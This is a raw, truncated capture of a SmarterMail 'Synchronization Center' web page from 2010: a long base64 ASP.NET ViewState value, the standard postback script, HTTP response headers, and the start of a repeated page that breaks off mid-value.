ZSBBY3RpdmVTeW5jIGlzIG5vdCBjdXJyZW50bHkgZW5hYmxlZCBmb3IgeW91ciBhY2NvdW50LjwvZGl2PjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sV3JhcHBlcic+PGRpdiBjbGFzcz0nUHJvdG9jb2xOYW1lJz5TeW5jTUw8L2Rpdj48ZGl2IGNsYXNzPSdQcm90b2NvbERlc2NyaXB0aW9uJz5TeW5jTUwgaXMgYSBwbGF0Zm9ybS1pbmRlcGVuZGVudCBzeW5jaHJvbml6YXRpb24gc3RhbmRhcmQgdGhhdCBzeW5jcyBTbWFydGVyTWFpbCBtYWlsYm94ZXMgd2l0aCBPdXRsb29rLCBUaHVuZGVyYmlyZCwgYW5kIG1vc3QgbW9iaWxlIGRldmljZXMuPC9kaXY+PGRpdiBjbGFzcz0nUHJvdG9jb2xEZXNjcmlwdGlvbic+VXNpbmcgdGhlIFN5bmNNTCBwcm90b2NvbCwgeW91IGNhbiBzeW5jIHRoZSBmb2xsb3dpbmcgY29sbGFib3JhdGlvbiBpdGVtcyB3aXRoIHRoZSBpUG9kL2lQaG9uZTogY29udGFjdHMsIGNhbGVuZGFycywgYW5kIHRhc2tzLjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sU3RhdHVzJz5TeW5jTUwgaXMgZW5hYmxlZCBmb3IgeW91ciBhY2NvdW50LjwvZGl2PjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sV3JhcHBlcic+PGRpdiBjbGFzcz0nUHJvdG9jb2xOYW1lJz5DYXJkREFWPC9kaXY+PGRpdiBjbGFzcz0nUHJvdG9jb2xEZXNjcmlwdGlvbic+Q2FyZERBViBpcyBhbiBleHRlbnNpb24gb2YgdGhlIFdlYkRBViBwcm90b2NvbCB0aGF0IHN5bmNzIFNtYXJ0ZXJNYWlsIGNvbnRhY3RzIHdpdGggTWFjcywgaVBhZHMsIGlQaG9uZXMsIGFuZCBvdGhlciBkZXZpY2VzL2FwcGxpY2F0aW9ucyB0aGF0IHVzZSB0aGUgdGVjaG5vbG9neS48L2Rpdj48ZGl2IGNsYXNzPSdQcm90b2NvbERlc2NyaXB0aW9uJz5Vc2luZyB0aGUgQ2FyZERBViBwcm90b2NvbCwgeW91IGNhbiBzeW5jIHRoZSBmb2xsb3dpbmcgY29sbGFib3JhdGlvbiBpdGVtcyB3aXRoIHRoZSBpUG9kL2lQaG9uZTogY29udGFjdHMuPC9kaXY+PGRpdiBjbGFzcz0nUHJvdG9jb2xTdGF0dXMnPjwvZGl2PjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sV3JhcHBlcic+PGRpdiBjbGFzcz0nUHJvdG9jb2xOYW1lJz5DYWxEQVY8L2Rpdj48ZGl2IGNsYXNzPSdQcm90b2NvbERlc2NyaXB0aW9uJz5DYWxEQVYgaXMgYW4gZXh0ZW5zaW9uIG9mIHRoZSBXZWJEQVYgcHJvdG9jb2wgdGhhdCBzeW5jcyBTbWFydGVyTWFpbCBjYWxlbmRhcnMgd2l0aCBNYWNzLCBpUGFkcywgaVBob25lcywgVGh1bmRlcmJpcmQgYW5kIG90aGVyIGRldmljZXMvYXBwbGljYXRpb25zIHRoYXQgdXNlIHRoZSB0ZWNobm9sb2d5LjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sRGVzY3JpcHRpb24nPlVzaW5nIHRoZSBDYWxEQVYgcHJvdG9jb2wsIHlvdSBjYW4gc3luYyB0aGUgZm9sbG93aW5nIGNvbGxhYm9yYXRpb24gaXRlbXMgd2l0aCB0aGUgaVBvZC9pUGhvbmU6IGNhbGVuZGFycy48L2Rpdj48ZGl2IGNsYXNzPSdQcm90b2NvbFN0YXR1cyc+PC9kaXY+PC9kaXY+PGRpdiBjbGFzcz0nUHJvdG9jb2xXcmFwcGVyJz48ZGl2IGNsYXNzPSdQcm90b2NvbE5hbWUnPkFkZGl0aW9uYWwgSW5mb3JtYXRpb248L2Rpdj48ZGl2IGNsYXNzPSdQcm90b2NvbERlc2NyaXB0aW9uJz5Gb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBzeW5jaHJvbml6aW5nIFNtYXJ0ZXJNYWlsIHdpdGggbW9iaWxlIGRldmljZXMgYW5kIGFwcGxpY2F0aW9ucywgcGxlYXNlIHJlZmVyIHRvIHRoZSA8YSBocmVmPSJodHRwOi8vd3d3LnNtYXJ0ZXJ0b29scy5jb20vZG93bmxvYWRzL2RvY3VtZW50cy9zbWFydGVybWFpbC9zbWFydGVybWFpbF9zeW5jaHJvbml6YXRpb25fY29sbGFib3JhdGlvbi5wZGYiIHRhcmdldCA9Il9ibGFuayI+U3luY2hyb25pemluZyB3aXRoIFNtYXJ0ZXJNYWlsPC9hPiB3aGl0ZSBwYXBlci4gU3RlcC1ieS1zdGVwIGluc3RydWN0aW9ucyBmb3Igc3luY2hyb25pemluZyBhIHNwZWNpZmljIGRldmljZSBtYXkgYWxzbyBiZSBhdmFpbGFibGUgaW4gdGhlIDxhIGhyZWY9Imh0dHA6Ly9wb3J0YWwuc21hcnRlcnRvb2xzLmNvbS9LQi9jOTYvaG93LXRvLmFzcHgiIHRhcmdldD0iX2JsYW5rIj5TbWFydGVyVG9vbHMgS25vd2xlZGdlIEJhc2U8L2E+LjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sRGVzY3JpcHRpb24nPjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sU3RhdHVzJz48L2Rpdj48L2Rpdj48L2Rpdj5kAgQPZBYCAgEPZBYEAgEPZBYCAgEPZBYIAgMPZBYEZg8PFgIfAwUHT3V0bG9va2RkAgEPDxYCHwQFPmh0dHA6Ly9pbWFnZXMuc21hcnRlcnRvb2xzLmNvbS9zbWFydGVybWFpbC92Ny9pY29uX291dGxvb2sucG5nZGQCBA9kFgRmDw8WAh8DBQtUaHVuZGVyYmlyZGRkAgEPDxYCHwQFQmh0dHA6Ly9pbWFnZXMuc21hcnRlcnRvb2xzLmNvbS9zbWFydGVybWFpbC92Ny9pY29uX3RodW5kZXJiaXJkLnBuZ2RkAgUPZBYEZg8PFgIfAwUMQWRkcmVzcyBCb29rZGQCAQ8PFgIfBAVCaHR0cDovL2ltYWdlcy5zbWFydGVydG9vbHMuY29tL3NtYXJ0ZXJtYWlsL3Y3L2ljb25fYWRkcmVzc2Jvb2sucG5nZGQCBg9kFgRmDw8WAh8DBQRpQ2FsZGQCAQ8PFgIfBAU7aHR0cDovL2ltYWdlcy5zbWFydGVydG9vbHMuY29tL3NtYXJ0ZXJtYWlsL3Y3L2ljb25faWNhbC5wbmdkZAIDD2QWAgIBD2QWAmYPZBYCAgEPFgIfAwWfFTxkaXYgY2xhc3M9J0RldmljZVdyYXBwZXInPjxkaXYgY2xhc3M9J0RldmljZU5hbWUnPk1pY3Jvc29mdCBPdXRsb29rPC9kaXY+PGRpdiBjbGFzcz0nRGV2aWNlRGVzY3JpcHRpb24nPk1pY3Jvc29mdCBPdXRsb29rIGlzIGFuIGVtYWlsIGNsaWVudCBkZXZlbG9wZWQgYnkgTWljcm9zb2Z0IEluYy4gZm9yIG1hbmFnaW5nIG1lc3NhZ2VzLCBjb250YWN0cywgYW5kIGFwcG9pbnRtZW50cyBhbmQgaXMgY29tbW9ubHkgZGlzdHJpYnV0ZWQgYXMgcGFydCBvZiB0aGUgTWljcm9zb2Z0IE9mZmljZSBzdWl0ZS4gRm9yIG1vcmUgaW5mb3JtYXRpb24sIHZpc2l0IDxhIGhyZWY9Imh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9vdXRsb29rIiB0YXJnZXQ9Il9ibGFuayI+d3d3Lm1pY3Jvc29mdC5jb20vb3V0bG9vazwvYT4uPC9kaXY+PGRpdiBjbGFzcz0nRGV2aWNlQ2FwYWJpbGl0aWVzJz5TeW5jaHJvbml6ZXM6IEFwcG9pbnRtZW50cywgQ29udGFjdHMsIE5vdGVzLCBFbWFpbCwgVGFza3M8L2Rpdj48ZGl2IGNsYXNzPSdQcm90b2NvbFdyYXBwZXInPjxkaXYgY2xhc3M9J1Byb3RvY29sTmFtZSc+U3luY01MPC9kaXY+PGRpdiBjbGFzcz0nUHJvdG9jb2xEZXNjcmlwdGlvbic+U3luY01MIGlzIGEgcGxhdGZvcm0taW5kZXBlbmRlbnQgc3luY2hyb25pemF0aW9uIHN0YW5kYXJkIHRoYXQgc3luY3MgU21hcnRlck1haWwgbWFpbGJveGVzIHdpdGggT3V0bG9vaywgVGh1bmRlcmJpcmQsIGFuZCBtb3N0IG1vYmlsZSBkZXZpY2VzLjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sRGVzY3JpcHRpb24nPlVzaW5nIHRoZSBTeW5jTUwgcHJvdG9jb2wsIHlvdSBjYW4gc3luYyB0aGUgZm9sbG93aW5nIGNvbGxhYm9yYXRpb24gaXRlbXMgd2l0aCBPdXRsb29rOiBjb250YWN0cywgY2FsZW5kYXJzLCB0YXNrcywgYW5kIG5vdGVzLjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sU3RhdHVzJz5TeW5jTUwgaXMgZW5hYmxlZCBmb3IgeW91ciBhY2NvdW50LjwvZGl2PjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sV3JhcHBlcic+PGRpdiBjbGFzcz0nUHJvdG9jb2xOYW1lJz5BZGQgdG8gT3V0bG9vazwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sRGVzY3JpcHRpb24nPlRoZSBBZGQgdG8gT3V0bG9vayBmZWF0dXJlIHdpdGhpbiB0aGUgU21hcnRlck1haWwgd2VibWFpbCBpbnRlcmZhY2UgdXNlcyB0d28td2F5IHN5bmNocm9uaXphdGlvbiB0ZWNobm9sb2d5IHRvIHN5bmMgYSBTbWFydGVyTWFpbCBtYWlsYm94IHdpdGggT3V0bG9vayAyMDA3IGFuZCBwcm92aWRlcyByZWFkLW9ubHkgY2FwYWJpbGl0eSBmb3IgT3V0bG9vayAyMDAzLjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sRGVzY3JpcHRpb24nPlVzaW5nIEFkZCB0byBPdXRsb29rLCB5b3UgY2FuIHN5bmMgdGhlIGZvbGxvd2luZyBjb2xsYWJvcmF0aW9uIGl0ZW1zOiBjYWxlbmRhcnMsIGNvbnRhY3RzLCBhbmQgdGFza3MuPC9kaXY+PGRpdiBjbGFzcz0nUHJvdG9jb2xTdGF0dXMnPjwvZGl2PjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sV3JhcHBlcic+PGRpdiBjbGFzcz0nUHJvdG9jb2xOYW1lJz5TbWFydGVyTWFpbCBTeW5jPC9kaXY+PGRpdiBjbGFzcz0nUHJvdG9jb2xEZXNjcmlwdGlvbic+U21hcnRlck1haWwgU3luYyBpcyBhIGRlc2t0b3AgdXRpbGl0eSBkZXZlbG9wZWQgYnkgU21hcnRlclRvb2xzIHRoYXQgYWxsb3dzIHlvdSB0byBxdWlja2x5IGFuZCBlYXNpbHkgc3luY2hyb25pemUgeW91ciBjYWxlbmRhcnMsIGNvbnRhY3RzLCB0YXNrcywgYW5kIG5vdGVzIHdpdGggTWljcm9zb2Z0IE91dGxvb2sgYW5kIFdpbmRvd3MgUGhvbmVzLjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sRGVzY3JpcHRpb24nPlVzaW5nIHRoZSBTbWFydGVyTWFpbCBTeW5jIHByb3RvY29sLCB5b3UgY2FuIHN5bmMgdGhlIGZvbGxvd2luZyBjb2xsYWJvcmF0aW9uIGl0ZW1zIHdpdGggT3V0bG9vazogY29udGFjdHMsIGNhbGVuZGFycywgdGFza3MsIGFuZCBub3Rlcy48L2Rpdj48ZGl2IGNsYXNzPSdQcm90b2NvbFN0YXR1cyc+PC9kaXY+PC9kaXY+PGRpdiBjbGFzcz0nUHJvdG9jb2xXcmFwcGVyJz48ZGl2IGNsYXNzPSdQcm90b2NvbE5hbWUnPkFkZGl0aW9uYWwgSW5mb3JtYXRpb248L2Rpdj48ZGl2IGNsYXNzPSdQcm90b2NvbERlc2NyaXB0aW9uJz5Gb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBzeW5jaHJvbml6aW5nIFNtYXJ0ZXJNYWlsIHdpdGggbW9iaWxlIGRldmljZXMgYW5kIGFwcGxpY2F0aW9ucywgcGxlYXNlIHJlZmVyIHRvIHRoZSA8YSBocmVmPSJodHRwOi8vd3d3LnNtYXJ0ZXJ0b29scy5jb20vZG93bmxvYWRzL2RvY3VtZW50cy9zbWFydGVybWFpbC9zbWFydGVybWFpbF9zeW5jaHJvbml6YXRpb25fY29sbGFib3JhdGlvbi5wZGYiIHRhcmdldCA9Il9ibGFuayI+U3luY2hyb25pemluZyB3aXRoIFNtYXJ0ZXJNYWlsPC9hPiB3aGl0ZSBwYXBlci4gU3RlcC1ieS1zdGVwIGluc3RydWN0aW9ucyBmb3Igc3luY2hyb25pemluZyBhIHNwZWNpZmljIGRldmljZSBtYXkgYWxzbyBiZSBhdmFpbGFibGUgaW4gdGhlIDxhIGhyZWY9Imh0dHA6Ly9wb3J0YWwuc21hcnRlcnRvb2xzLmNvbS9LQi9jOTYvaG93LXRvLmFzcHgiIHRhcmdldD0iX2JsYW5rIj5TbWFydGVyVG9vbHMgS25vd2xlZGdlIEJhc2U8L2E+LjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sRGVzY3JpcHRpb24nPjwvZGl2PjxkaXYgY2xhc3M9J1Byb3RvY29sU3RhdHVzJz48L2Rpdj48L2Rpdj48L2Rpdj5kAgYPZBYCAgEPZBYCZg9kFgICAw8WAh8CaGQCDQ9kFgICAQ9kFgICAQ8QDxYCHgdDaGVja2VkaGRkZGQYBQUdY3RsMDAkVFBIJHRhYlN0cmlwJHRhYkRlc2t0b3APMtULAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAAhARGVza3RvcAH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAYPAAAACXB2RGVza3RvcAtkBRxjdGwwMCRUUEgkdGFiU3RyaXAkdGFiTW9iaWxlDzLTCwABAAAA/////wEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz////kAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr////8////BgcAAAAEVGV4dAoB+P////z///8GCQAAAApSZXNvdXJjZUlEBgoAAAAHQE1vYmlsZQH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAYPAAAACHB2TW9iaWxlC2QFHGN0bDAwJFRQSCR0YWJTdHJpcCR0YWJBY3RpdmUPMtMLAAEAAAD/////AQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E/P///+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB+v////z///8GBwAAAARUZXh0CgH4/////P///wYJAAAAClJlc291cmNlSUQGCgAAAAdAQWN0aXZlAfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lEBg8AAAAIcHZBY3RpdmULZAUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFGGN0bDAwJEJQSCRjaGtTaG93QXRMb2dpbgUaY3RsMDAkTVBIJGdyZEFjdGl2ZURldmljZXMPBSRUcnVlfFRydWV8fEZhbHNlfFRydWV8fEZhbHNlfEZhbHNlfDBkvXrzJNslqQhhPjNEy454T+k4z/o=" />
</div>
<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>
<script src="/WebResource.axd?d=lFfe_wSSLYBiWo0hdQTqNA2&t=633802452069218315" type="text/javascript"></script>
<script src="/ScriptResource.axd?d=9LtTppofNdzfPwjqAv6ngOF_m3Ok_PFqwhuv90rOoA_SHM2fVCRbipJCEnE9OMFtjNNZaXF1BttRFjWpHbAPstnprDdIVLeDszcVmLsdfwM1&t=ffffffff8fb8c655" type="text/javascript"&..
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 06:57:15 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 327169
Connection: Close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="ctl00_head1"><title>
Synchronization Center
</title><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Main/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Mail/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Popup/&rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=Telerik&rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="innerpopup" dir="ltr">
<form method="post" action="frmDeviceSync.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTkxNjAzNDgyNg8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWBgIHD2QWAmYPZBYCAgEPFgIeB1Zpc2libGVoFgICAQ8WAh4EVGV4dGVkAgsPZBYEAgEPZBYCAgMPFgIfAwUHTWVzc2FnZWQCAw9kFgYCAg9kFgICAQ9kFgQCAQ9kFgICAQ9kFg4CAw9kFgRmDw8WAh8DBQ1pUG9kIC8gaVBob25lZGQCAQ8PFgIeCEltYWdlVXJsBTxodHRwOi8vaW1hZ2VzLnNtYXJ0ZXJ0b29scy5jb20vc21hcnRlcm1haWwvdjcvaWNvbl9hcHBsZS5wbmdkZAIED2QWBGYPDxYCHwMFBGlQYWRkZAIBDw8WAh8EBTxodHRwOi8vaW1hZ2VzLnNtYXJ0ZXJ0b29scy5jb20vc21hcnRlcm1haWwvdjcvaWNvbl9hcHBsZS5wbmdkZAIFD2QWBGYPDxYCHwMFCkJsYWNrQmVycnlkZAIBDw8WAh8EBUFodHRwOi8vaW1hZ2VzLnNtYXJ0ZXJ0b29